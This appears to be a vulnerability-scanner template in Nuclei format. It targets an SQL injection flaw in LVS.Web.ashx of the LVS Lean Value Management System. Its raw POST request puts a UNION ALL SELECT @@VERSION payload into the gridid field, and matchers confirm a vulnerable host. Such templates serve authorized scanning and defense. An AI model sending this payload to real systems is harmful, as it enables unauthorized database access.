http:
    - matchers:
        - part: body
          type: word
          words:
            - <X64> (Build
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /ajax/LVS.Web.AgencytaskList,LVS.Web.ashx?_method=GetColumnIndex&_session=r HTTP/1.1
          Host: {{Hostname}}
          Content-Type: text/plain; charset=UTF-8

          src=AgencytaskList
          gridid=1' UNION ALL SELECT @@VERSION--
id: LVS-Webashx-sql
info:
    author: Superhero
    description: LVS精益价值管理系统  LVS.Web.ashx存在SQL注入漏洞
    name: LVS精益价值管理系统  LVS.Web.ashx SQL注入漏洞
    severity: high
    tags:
        - LVS精益价值管理系统
